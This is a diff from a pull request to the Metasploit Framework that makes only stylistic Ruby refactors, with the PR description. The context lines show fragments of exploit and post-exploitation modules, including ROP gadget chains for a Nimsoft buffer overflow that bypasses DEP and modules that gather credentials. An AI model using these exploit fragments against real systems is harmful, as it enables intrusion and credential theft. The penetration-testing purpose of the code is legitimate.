+    elog('Could not connect to session', error: e)
+    raise Msf::Exploit::Failed, 'Could not connect to session'
   end
 
   def validate_payload

--- a/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1337_printerdemon.rb
@@ -146,12 +146,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def validate_active_host
-    begin
-      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-    rescue Rex::Post::Meterpreter::RequestError => e
-      elog('Could not connect to session', error: e)
-      raise Msf::Exploit::Failed, 'Could not connect to session'
-    end
+    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog('Could not connect to session', error: e)
+    raise Msf::Exploit::Failed, 'Could not connect to session'
   end
 
   def validate_payload

--- a/modules/exploits/windows/local/srclient_dll_hijacking.rb
+++ b/modules/exploits/windows/local/srclient_dll_hijacking.rb
@@ -64,7 +64,6 @@ class MetasploitModule < Msf::Exploit::Local
       OptBool.new('STEALTH_ONLY', [false, 'Only exploit if the payload can be triggered without launching the Windows Update UI) ', false]),
       OptInt.new('WAIT_FOR_TIWORKER', [false, 'No. of minutes to wait for TiWorker.exe to finish running if it is already active. ', 0])
     ])
-
   end
 
   def provided_path_dir

--- a/modules/exploits/windows/nimsoft/nimcontroller_bof.rb
+++ b/modules/exploits/windows/nimsoft/nimcontroller_bof.rb
@@ -71,14 +71,12 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(48000),
       ]
     )
-
   end
 
   # check: there are only two prerequisites to getting code execution. The version number
   # and access to the directory_list probe. The easiest way to get this information is to
   # ask nicely ;)
   def check
-
     connect
 
     sock.put(generate_probe('get_info', ['interfaces=0']))
@@ -105,7 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       return CheckCode::Safe
     end
-
   end
 
   def exploit
@@ -148,13 +145,11 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put(exploit_packet)
 
     disconnect
-
   end
 
   # generate_rsp_chain: This chain will re-align RSP / Stack, it MUST be a multiple of 16 bytes
   # otherwise our call will fail. I had VP work 50% of the time when the stack was unaligned.
   def generate_rsp_chain
-
     rop_gadgets = [0x0000000140018c42] * 20 # ret
     rop_gadgets += [
       0x0000000140002ef6, # pop rax ; ret
@@ -165,14 +160,12 @@ class MetasploitModule < Msf::Exploit::Remote
     ] # add esp, edi ; adc byte [rax], al ; add rsp, 0x0000000000000278 ; ret
 
     return rop_gadgets.pack('<Q*')
-
   end
 
   # generate_rop_chain: This chain will craft function calls to GetModuleHandleA, GetProcAddressStub,
   # and finally VirtualProtectStub. Once completed, we have bypassed DEP and can get code execution.
   # Since we dynamically generate VirtualProtectStub, we needn't worry about other OS's.
   def generate_rop_chain
-
     # RAX -> HMODULE GetModuleHandleA(
     #   ( RCX == *module ) LPCSTR lpModuleName,
     # );
@@ -320,13 +313,11 @@ class MetasploitModule < Msf::Exploit::Remote
     rop_gadgets += [0x0000000140018c42] * 20 # ret (do not remove)
 
     return rop_gadgets.pack('<Q*')
-
   end
 
   # parse_listing: once the directory_list probe is sent we're returned a directory listing
   # unfortunately it's hard to read this simply "decodes" it
   def parse_listing(response, directory)
-
     result = { 'name' => '', 'date' => '', 'size' => '', 'type' => '' }
     i = 0
 
@@ -424,7 +415,6 @@ class MetasploitModule < Msf::Exploit::Remote
   # generate_probe: The nimcontroller utilizes the closed source protocol nimsoft so we need to specially
   # craft probes in order for the controller to accept any input.
   def generate_probe(probe, args)
-
     client = "#{rand_text_alphanumeric(14)}\x00"
     packet_args = ''
     probe += "\x00"
@@ -474,7 +464,6 @@ class MetasploitModule < Msf::Exploit::Remote
     probe = packet_header + packet_body + packet_args
 
     return probe
-
   end
 
 end

--- a/modules/post/networking/gather/enum_cisco.rb
+++ b/modules/post/networking/gather/enum_cisco.rb
@@ -28,7 +28,6 @@ class MetasploitModule < Msf::Post
         OptPath.new('WORDLIST', [false, 'Wordlist of possible enable passwords to try.'])
       ]
     )
-
   end
 
   def run

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -48,7 +48,6 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-
     fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump
     print_status('AvDump.exe exists!')
 
@@ -65,6 +64,5 @@ class MetasploitModule < Msf::Post
 
     print_status(result)
     rm_f(dump_path)
-
   end
 end

--- a/modules/post/windows/gather/bloodhound.rb
+++ b/modules/post/windows/gather/bloodhound.rb
@@ -48,7 +48,6 @@ class MetasploitModule < Msf::Post
       OptBool.new('NoSaveCache', [false, 'Dont save the cache file to disk', true]),
       OptString.new('ZipFileName', [false, 'Zip Output File Name.  Blank for random', '']),
     ])
-
   end
 
   # Options removed or changed in sharphound v2 to sharphound v3

--- a/modules/post/windows/gather/credentials/pulse_secure.rb
+++ b/modules/post/windows/gather/credentials/pulse_secure.rb
@@ -38,7 +38,6 @@ class MetasploitModule < Msf::Post
         'Author' => ['Quentin Kaiser <kaiserquentin[at]gmail.com>']
       )
     )
-
   end
 
   # Decrypts `data` encrypted with Windows DPAPI by calling CryptUnprotectData


### PR DESCRIPTION
This has come up a few times during PR review, probably best to just automate it.

```ruby
# Use implicit begin blocks where possible.

# bad
def foo
  begin
    # main logic goes here
  rescue
    # failure handling goes here
  end
end

# good
def foo
  # main logic goes here
rescue
  # failure handling goes here
end
```

https://github.com/rubocop/ruby-style-guide#implicit-begin

## Verification

Best viewed with whitespace disabled [?=w1](https://github.com/rapid7/metasploit-framework/pull/15192/files?w=1)